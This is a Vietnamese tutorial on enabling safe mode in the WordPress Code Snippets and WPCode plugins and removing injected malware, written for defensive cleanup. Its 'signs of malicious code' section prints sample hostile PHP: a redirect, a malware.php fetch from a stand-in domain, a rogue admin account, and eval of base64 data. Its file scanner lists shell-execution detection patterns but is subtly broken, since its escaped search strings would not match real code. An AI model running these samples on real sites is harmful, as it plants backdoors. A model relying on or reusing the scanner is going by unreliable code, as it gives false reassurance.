Bật safe mode trên plugin Code snippets
Sơ đồ trang
Khi làm việc với các plugin Code Snippets như Code Snippets hoặc WPCode, việc debug và xử lý lỗi là vô cùng quan trọng để tránh làm crash website, ngoài ra còn 1 vấn đề team Vũ Trụ Số rất hay gặp phải đó là website đột nhiên bị lỗi hoặc hiển thị nội dung lạ, có thể do mã độc đã được chèn vào thông qua các plugin Code Snippets!
Bài viết này sẽ hướng dẫn bạn cách sử dụng Safe Mode để xác định hacker có chèn code thực thi mã độc vào plugin và ẩn toàn bộ các tuỳ chọn liên quan tới plugin hay không.
Tại sao cần Safe Mode?
Safe Mode là tính năng quan trọng giúp bạn:
- Tạm thời vô hiệu hóa tất cả snippets khi website gặp lỗi
- Truy cập vào admin để sửa chữa snippet gây lỗi
- Tránh tình trạng bị khóa khỏi website do lỗi code
- Truy cập vào admin để sửa chữa snippet gây lỗi hoặc bị nhiễm mã độc
- Tránh tình trạng bị khóa khỏi website do lỗi code hoặc malware
- Kiểm tra và làm sạch các snippet đáng ngờ
⚠️ CẢNH BÁO:
Bài viết này hướng dẫn cách xử lý khẩn cấp khi web lỗi hoặc website bị nhiễm mã độc khi bị chèn code vào 2 plugin code snippet phổ biến:
- WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager
- Code Snippets
Dấu hiệu website bị nhiễm mã độc qua Code Snippets
- Website hiển thị màn hình trắng (White Screen of Death)
- Xuất hiện popup quảng cáo lạ
- Website chuyển hướng đến trang khác
- Không thể truy cập wp-admin
- Website chạy chậm bất thường
- Xuất hiện nội dung spam, links lạ
PHƯƠNG PHÁP KHẮC PHỤC KHẨN CÁP
Bước 1: Bật Safe Mode ngay lập tức
Đối với WPCode Plugin
Thêm parameter vào URL admin:
https://yoursite.com/wp-admin/?wpcode-safe-mode=1
Nếu không thể truy cập admin, thử trên trang login:
https://yoursite.com/wp-login.php?wpcode-safe-mode=1
Đối với Code Snippets Plugin
Phương pháp 1: Chỉnh sửa wp-config.php Truy cập file manager hoặc FTP, mở file wp-config.php và thêm dòng này ngay trước /* That's all, stop editing! Happy blogging. */:
Bài viết liên quan
define( 'CODE_SNIPPETS_SAFE_MODE', true );
Phương pháp 2: Thêm parameter vào URL
https://yoursite.com/wp-admin/?snippets-safe-mode=1
Bước 2: Truy cập Admin và Kiểm tra
Sau khi bật safe mode:
- Đăng nhập vào wp-admin
- Vào Plugins → tìm plugin Code Snippets hoặc WPCode
- Kiểm tra danh sách snippets có code đáng ngờ
Bước 3: Nhận diện Mã Độc
Các dấu hiệu code độc hại:
// Code chèn JavaScript lạ
echo '<script>window.location="http://malicious-site.com"</script>';
// Code tải file từ server lạ
file_get_contents('http://malicious-domain.com/malware.php');
// Code tạo user admin lạ
wp_create_user('hacker', 'password123', 'hacker@evil.com');
// Code base64 encode (thường để ẩn mã độc)
eval(base64_decode('bWFsaWNpb3VzIGNvZGUgaGVyZQ=='));
// Code curl đến domain lạ
curl_exec($ch);
// Code gửi email spam
wp_mail($to, $subject, $spam_content);
Bước 4: Xóa Mã Độc
- Vô hiệu hóa tất cả snippets đáng ngờ
- Xóa hoàn toàn các snippet chứa mã độc
- Kiểm tra lại từng snippet còn lại
Bước 5: Kiểm tra Toàn Diện
Quét Malware
// Tạo file scan.php để quét file độc hại
<?php
$directory = __DIR__;
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory));
foreach ($files as $file) {
if ($file->isFile() && $file->getExtension() === 'php') {
$content = file_get_contents($file->getPathname());
// Tìm các pattern nguy hiểm
$dangerous_patterns = [
'eval\(',
'base64_decode\(',
'file_get_contents\(',
'curl_exec\(',
'shell_exec\(',
'system\(',
'exec\('
];
foreach ($dangerous_patterns as $pattern) {
if (strpos($content, $pattern) !== false) {
echo "Suspicious file: " . $file->getPathname() . "\n";
break;
}
}
}
}
?>
PHƯƠNG PHÁP PHÒNG NGỪA
1. Backup Thường Xuyên
// Tạo backup trước khi thêm snippet
// Sử dụng plugin backup như UpdraftPlus
2. Hạn Chế Quyền Truy Cập
- Chỉ cho phép admin tin cậy sử dụng Code Snippets
- Thay đổi mật khẩu admin thường xuyên
- Sử dụng 2FA (Two-Factor Authentication)
3. Kiểm Tra Code Trước Khi Chạy
// KHÔNG BAO GIỜ chạy code không rõ nguồn gốc
// LUÔN LUÔN test trên staging site trước
// KIỂM TRA kỹ mọi đoạn code trước khi activate
4. Monitor Website
- Cài đặt plugin security như Wordfence
- Theo dõi log files thường xuyên
- Kiểm tra traffic bất thường
XỬ LÝ KHI KHÔNG THỂ TRUY CẬP ADMIN
Phương pháp 1: Vô hiệu hóa plugin qua FTP/File Manager
Đổi tên thư mục plugin:
/wp-content/plugins/code-snippets/ → /wp-content/plugins/code-snippets-disabled/
/wp-content/plugins/insert-headers-and-footers/ → /wp-content/plugins/insert-headers-and-footers-disabled/
Phương pháp 2: Xóa snippet trực tiếp trong Database
Truy cập phpMyAdmin và chạy:
-- Đối với Code Snippets plugin
DELETE FROM wp_snippets WHERE code LIKE '%malicious_pattern%';
-- Đối với WPCode plugin
DELETE FROM wp_posts WHERE post_type = 'wpcode' AND post_content LIKE '%malicious_pattern%';
Phương pháp 3: Khôi phục từ Backup sạch
- Tải backup gần nhất trước khi bị nhiễm
- Khôi phục files và database
- Cập nhật WordPress và plugins
- Thay đổi tất cả mật khẩu
KIỂM TRA SAU KHI DỌN DẸP
1. Scan Security
# Sử dụng công cụ online
- Sucuri SiteCheck
- VirusTotal
- Google Safe Browsing
2. Kiểm tra Performance
- Tốc độ load trang
- CPU usage trên hosting
- Database queries
3. Kiểm tra SEO
- Google Search Console
- Kiểm tra có bị blacklist không
- Sitemap có bình thường không
CẢNH BÁO QUAN TRỌNG
🚨 NGUY HIỂM THƯỜNG GẶP:
- Hacker thường ẩn mã độc trong code dài, phức tạp
- Mã độc có thể tạo backdoor để quay lại
- Code có thể được obfuscate (mã hóa) để khó phát hiện
- Một số mã độc chỉ hoạt động với điều kiện nhất định
💡 LỜI KHUYÊN:
- KHÔNG BAO GIỜ copy/paste code từ nguồn không tin cậy
- LUÔN LUÔN backup trước khi thêm snippet mới
- KIỂM TRA code snippet thường xuyên
- SỬ DỤNG staging site để test
- CÀI ĐẶT plugin security monitoring
HỖ TRỢ KHẨN CẤP
Nếu không thể tự khắc phục:
- Liên hệ hosting provider để được hỗ trợ
- Thuê chuyên gia WordPress security
- Sử dụng dịch vụ malware removal chuyên nghiệp
- Restore từ backup sạch nhất có thể
Nếu gặp bất cứ khó khăn nào vui lòng liên hệ với chung tôi để được hỗ trợ sớm nhất.
Xin cảm ơn.
